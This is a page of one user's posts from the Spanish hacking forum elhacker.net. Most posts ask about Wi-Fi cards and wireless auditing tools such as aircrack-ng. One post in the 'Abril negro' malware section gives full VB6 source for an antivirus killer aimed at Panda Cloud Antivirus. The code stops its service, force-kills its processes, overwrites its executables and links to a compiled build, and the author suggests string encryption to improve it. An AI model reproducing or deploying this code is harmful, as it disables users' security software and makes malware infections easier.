elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 ... 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 [61] 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 ... 102
601  Seguridad Informática / Materiales y equipos / Re: Consejo Compra: Alfa Network AWUS036H, Alfa Network AWUS036H V5, eRize ERZW54-US en: 8 Septiembre 2010, 18:27 pm
Buenas, yo me acabo de comprar la Alfa 1W + 5dbi antenna en ciudadwireless, y creo que es la mejor tarjeta que puedes comprarte.

La tarjeta 1) y la 2) son exactamente lo mismo, la única diferencia es que la 1) trae una antena de 2dbi y la 2) trae una antena de 5dbi. En resumidad cuentas: La mejor opción es la 2) Alfa Network AWUS036H V5 Adaptador USB Wireless 1W con Antena de 5dBi-54Mbps - 802.11b/g - Conector RP-SMA

http://www.ciudadwireless.com/alfa_network_awus036h_adaptador_wireless_antena_5dbi-54mbps_802-11b-g_conector_rp-sma-p-3355.html

Por otra parte, la antena 3) es una eRize, de 1W igual y con antena de 5dbi, te dejo una comparativa entre las 2 tarjetas, con gráficos y todo:

http://foro.seguridadwireless.net/adaptadores-wireless-usb/comparativa-alfa-1w-vs-erize-1w/

(De todas formas, la mejor compra es la tarjeta 2) que has puesto justo arriba)
602  Seguridad Informática / Wireless en Linux / Re: consulkta sobre targetas de red en: 3 Septiembre 2010, 15:02 pm
Las tarjetas con RJ45 con tarjetas Ethernet. Para la auditoría wireless necesitas tarjetas Wifi en lugar de Ethernet.

Te dejo un listado de tarjetas compatibles para las auditorías (hay más, pero éstas son las más comunes)

http://hwagm.elhacker.net/htm/tarjetas.htm
603  Seguridad Informática / Wireless en Linux / Re: RT2500 vs ipw2200 (y otras dudas que tengo...) en: 3 Septiembre 2010, 10:22 am
Gracias por contestar.

Por el momento dejaré puesta la RT2500 (me lo ha recomendado ChimoC) y haré pruebas.

Ayer atacando mi propio AP conseguí hacer ChopChop sin cliente con dicho chipset. El ataque de fragmentación sin cliente no me salió :_( De todas formas tengo que seguir investigando y documentandome en dichos ataques... por cierto, alguien tiene algún link o manual actualizado que hable sobre dichos ataques? Utilizo el airoscript y me vendría bien algún manual, tuto o video que explique como realizar esos 2 ataques usando el airoscript (sin usar comandos).

Saludos y gracias.
604  Seguridad Informática / Wireless en Linux / Re: RT2500 vs ipw2200 (y otras dudas que tengo...) en: 2 Septiembre 2010, 21:28 pm
Nadie me responde? :huh:

La duda que tengo es sencilla: Tengo la posibilidad de auditar con una RT2500 o una ipw2200, cual de esas 2 tarjetas me recomendáis? Cual es más compatible con todos los ataques? (fragmentación, chopchop, etc...)

Por otra parte, he actualizado el airrack-ng a la versión 1.1 y me he descargado un modulo de airoscript compatible para trabajar con los ficheros dump-01.csv en lugar de los *.txt ¿Necesito actualizar algo más para que funciona todo correctamente? ¿Me recomendáis actualizar algún módulo/herramienta más?
605  Seguridad Informática / Wireless en Linux / RT2500 vs ipw2200 (y otras dudas que tengo...) en: 2 Septiembre 2010, 16:07 pm
Hola a todos, llevo un tiempo mirando y leyendo ésta sección del foro orientado a la auditoría wireless y tengo un par de dudas que espero alguien me pueda resolver:

Actualmente dispongo de un equipo portátil para "batallas", al cual he instalado el WifiWay 1.0 final en el propio HDD, así como algunos módulos actualizados para disponer de las últimas versiones de todas sus herramientas. Aquí viene mi primera duda:



Actualmente el portatil viene equipado con esa tarjeta (Ralink RT2500), el WifiWay me la detecta correctamente, puedo ponerla en modo monitor e inyectar.

Como tengo la suerte de trabajar de informático en mi empresa, he podido desmantelar otro equipo portátil y extraer su tarjeta wifi para mi uso personal (una Intel ipw2200)



Puedo instalar cualquiera de las 2 tarjetas en mi portatil, y al arrancar el WifiWay me las detecta sin problemas... aquí vienen mis preguntas:

1) Que tarjeta me recomendáis que deje instalada? Cual de las 2 es mejor para auditar e inyectar? He oído que para las ipw2200 se necesita un airoscript diferente, etc.... ¿Si vosotros pudierais escoger una de esas 2 tarjetas para vuestro uso, cual es quedariais?

2) Actualmente mi versión de WifiWay 1.0 que tengo instalado en el HDD viene con el aircrack-ng versión 0.7 (creo). Soy consciente que ha salido la versión 1.0 RC4 y la 1.1... Me recomendáis que actualice el módulo de aircark-ng que viene en el propio WifiWay? De ser así.. que versión me recomendáis?

3) En el caso de que alguien me recomiende actualizar... ¿Las herramientas que dependel del aircrack-ng (como por ejemplo el airoscript) me seguirán funcionando con la versión actualizada del aircrack-ng?

En principio esas son mis 3 dudas que tengo. Por lo demás voy avanzando en mis auditorias. Tengo las herramientas de WLANdecrypter y jazzteldecrypter actualizadas a la 1.3.1 y 2 (respectivamente), ya que son las que más utilizo. Por otra parte estoy abierto a sujerencias de nuevas herramientas que me puedan venir bien para esos 2 chipsets de los que dispongo.

He leído mucho ya por el foro, pero algunos tutorial que leo son algo antiguos y hablan de programas o procesos desfasados por completo, es por eso que me he animado a abrir éste thread para conseguir información actual.

Gracias :)
606  Seguridad Informática / Abril negro / Re: Prueba de concepto - Anti Cloud Antivirus (Panda) en: 6 Mayo 2009, 12:21 pm
El nod32 v4 no se deja matar asi y el karpesky tampoco. habra mas pero yo solo se esos. La forma de matarlos es quitando los hook en las apis de terminar procesos

Exacto, me cito a mi mismo:

Éste código es genérico para la mayoría de Antivirus que basan su "protección" en servicios. Éste ejemplo no es válido para los Antivirus que basan su "protección" en drivers o hooks (Kaspersky, etc...).

Por eso, y aprovechando la ocasión, recomiendo utilizar sistemas de protección basados en drivers (a nive de Ring0 mejor) y Hook's. Como por ejemplo Kaspersky, NOD32, AVG y Avira... los demás son una m1erda de AV.

Saludos.
607  Seguridad Informática / Abril negro / Prueba de concepto - Anti Cloud Antivirus (Panda) en: 5 Mayo 2009, 23:27 pm
Bueno, primero quiero aclarar que este programa/source no entra dentro del "concurso de desarrollo de malware de Abril Negro 2009". Pero sí entra dentro del boletín para Abril Negro 2009, como prueba de concepto...

Anti Cloud Antivirus by MadAntrax :P

He diseñado una simple función que aprovecha los comandos típicos de Windows (taskkill, net, etc...) y los he aplicado en forma de bucles FOR y Sleep's para generar un AV-Killer genérico. En éste caso lo he diseñado para el nuevo Cloud Antivirus de Panda



Que es Cloud Antivirus?

Es el nuevo antivirus gratuito desarrollado por Panda, usando un método de programación que evita sobrecargar la CPU del usuario (Cloud Computing). He analizado el AV y he decidido crear un AV Killer para "matar" el nuevo producto de Panda.

:http://www.cloudantivirus.com/default.aspx?lang=spa
:http://es.wikipedia.org/wiki/Computaci%C3%B3n_en_nube

El source del programa es el siguiente:

modAntiCloudAV.bas
Código
  1. Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
  2.  
  3. Function StopService(ByVal sName As String) As Boolean
  4.    On Error Resume Next
  5.    Dim i As Integer
  6.  
  7.    For i = 1 To 3
  8.        Shell "net stop " & sName, vbHide
  9.        Sleep 250
  10.    Next i
  11.    Sleep 1000
  12.    DoEvents
  13.    StopService = True
  14. End Function
  15.  
  16. Function DestroyFile(ByVal sFileName As String, ByVal sFilePath As String) As Boolean
  17.    On Error Resume Next
  18.    Dim i As Integer
  19.  
  20.    For i = 1 To 3
  21.        Shell "taskkill /F /IM " & sFileName, vbHide
  22.        Sleep 250
  23.    Next i
  24.    Sleep 1000
  25.    DoEvents
  26.  
  27.    For i = 1 To 3
  28.        Open sFilePath For Output As #1
  29.            Print #1, "destroyed!"
  30.        Close #1
  31.        Sleep 10
  32.    Next i
  33.    DoEvents
  34.    DestroyFile = True
  35. End Function
  36.  

Éste código es genérico para la mayoría de Antivirus que basan su "protección" en servicios. Éste ejemplo no es válido para los Antivirus que basan su "protección" en drivers o hooks (Kaspersky, etc...). Para usar el módulo y matar CloudAV se utiliza así:

Código
  1. Private Sub CommandXP1_Click()
  2.    On Error Resume Next
  3.  
  4.    Dim WShell As Object
  5.    Dim CloudPath As String
  6.  
  7.    CommandXP1.Enabled = False
  8.    Set WShell = CreateObject("WScript.Shell")
  9.        CloudPath = WShell.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Panda Security\Nano Av\Setup\Path")
  10.    Set WShell = Nothing
  11.  
  12.    If CloudPath = "" Then
  13.        MsgBox "No se ha encontrado Cloud Antivirus instalado en el sistema", vbExclamation, "Anti-CloudAV"
  14.    Else
  15.        StopService "NanoServiceMain"
  16.        DoEvents
  17.        DestroyFile "PSUNMain.exe", CloudPath & "PSUNMain.exe"
  18.        DoEvents
  19.        DestroyFile "PSANHost.exe", CloudPath & "PSANHost.exe"
  20.        DoEvents
  21.        DestroyFile "PSANToManager.exe", CloudPath & "PSANToManager.exe"
  22.        DoEvents
  23.        'CloudAV destroyed
  24.        MsgBox "Proceso finalizado correctamente, comprueba si tu CloudAV sigue funcionando", vbInformation, "Anti-CloudAV"
  25.    End If
  26.    CommandXP1.Enabled = True
  27. End Sub
  28.  

El source es mejorable, se puede modificar para que no haga tantos bucles ni tantos sleep's y mejorar la rápidez. Pero como es una prueba de concepto... prefiero dejarlo así para evitar posibles copy&paste de noob's. Los que quieran usar ésta técnica tendrán la oportunidad de programarse correctamente un modulo más eficiente (evitar usar el objecto WScript, no usar Shell, cifrar las String's, control de errores, etc...)

;)

LINK DE DESCARGA: antiCloudAV (Fichero Compilado + Source en VB6)

Saludos.
608  Seguridad Informática / Abril negro / Re: Black Netbios Attack en: 29 Abril 2009, 00:22 am
por cierto aun te conectas con el e mail "a*k*n" ? pongo * por si las moscas :P

Sí, pero hice una "limpiza nuclear" y me quedé con solo 50 contactos en la lista, supongo que te eliminé porque no sabia quien eras... xD
609  Seguridad Informática / Abril negro / Re: Black Netbios Attack en: 29 Abril 2009, 00:10 am
Anda... agradecimientos a MadAntrax? Por que?
610  Seguridad Informática / Abril negro / Re: [Abril Negro 2009] Concurso de desarrollo de malware en: 17 Abril 2009, 14:36 pm
Que guay! Aprovecharé este concurso para publicar mi nueva tool: Cactus Ofuscator 1.0 A ver si lo termino pronto... :P
Páginas: 1 ... 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 [61] 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 ... 102
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines